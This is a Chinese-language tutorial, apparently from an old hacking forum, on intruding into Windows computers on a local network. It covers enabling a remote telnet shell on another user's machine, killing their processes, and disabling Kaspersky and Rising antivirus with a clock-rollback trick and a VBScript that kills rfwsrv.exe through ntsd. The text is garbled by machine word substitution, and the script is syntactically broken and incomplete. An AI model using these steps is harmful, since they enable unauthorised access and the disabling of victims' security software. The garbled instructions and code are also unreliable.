windows局域网的一个经典的入侵要领

3年前我用的对象了，可能大家对照老了，不过也许此刻还是能用上的，不过大家不妨事试验一下很有趣的。

　　点我的电脑(计算机(电脑))右键单机打点，然后点操纵底下的=》连接到此外一个计算机(电脑)。输入对方ip

　　或者你不知道对方ip 可以这样，点浏览高级里确当即查找，就可以显示本局域网事情组内的计算机(电脑)了。然后双击你要进入的电脑(计算机(电脑))，呵呵一般局域网的计算机(电脑)暗码是一样的，所以不需要NTLM验证，不过阿谁验证对照老了，此刻不知道还有没有人会用，进入后然后点处事和应用，找到telnet处事，然后开启对方telnet处事，如果没有进入这些界面或者处事堕落是因为对方没有开rpc处事，固然还是选择放弃吧， 如果凭据适才法式告成，那恭喜你已经得到一个进入对方计算机(电脑)的通道了。

　　然后在cmd底下输入 telnet 对方ip地点 就会显示对方的一个cmdshell了，固然这里有个小技巧，如果你不知道对方ip怎么办。很简单cmd下输入net view 可以检察到局域网计算机(电脑)名，然后点鼠标右键 符号你要的计算机(电脑)名字选中 按下回车就复制到cmd的剪切板里了， 然后用ping命令 ping 粘贴你适才复制的内容（直接点右键就出来了） 然后就能看到你ping的ip了。

　　进入对方计算机(电脑)该后该怎么做呢。 呵呵 很多黑客教程仿佛没有具体报告我们下一步我们该怎么办吧 嘿嘿。

　　阐扬你的想象，把对方电脑(计算机(电脑))就当成你本机一样去看待，好比你想检察对方进程。

　　cmd 下输入 tasklist

　　进程太多看不完怎么办 tasklist | more

　　想杀失他的进程怎么办？

　　taskkill /f /im 进程名字 /t 如关qq taskkill /f /im qq.exe /t

　　或者有的用ntsd杀进程

　　ntsd -c q -p PID

　　PID是用他是用tasklist就可以看到的比较相应的PID就能杀进程

　　如果多次查杀对方进程弗成功是什么原因，很可能对方有杀毒软件（反病毒软件或防毒软件）或者防火墙

　　怎么去杀失卡巴这些进程呢？

　　这里有一个脚本

　　Set ws = CreateObject（"Wscript.Shell"）

　　ws.run "cmd /c set date=%date% &&date 1988-1-1 &&ping -n 30 127.0.0.1&&date %date%",vbhide

　　for each ps in getobject（"winmgmts:\\.\root\cimv2:win32_proCESs"）.instances_

　　if ps.Name="rfwsrv.exe" then

　　ws.run "ntsd -c q -p ps.handle",0

　　我们可以这样去做 echo 加上面的每一行脚本代码>>c:\kill.vbs

　　最后在运行这个脚本 就可以了。 呵呵

　　也可以你感受麻烦直接输入 date 然后加日期改削成1988年摆布就行了 卡巴就掉效了

　　瑞星的道理也是taskkill失了rfwsrv.exe这个进程使杀毒软件（反病毒软件或防毒软件）掉效。

　　其他的就不用我说了本身研究点dos命令就可以搞定了。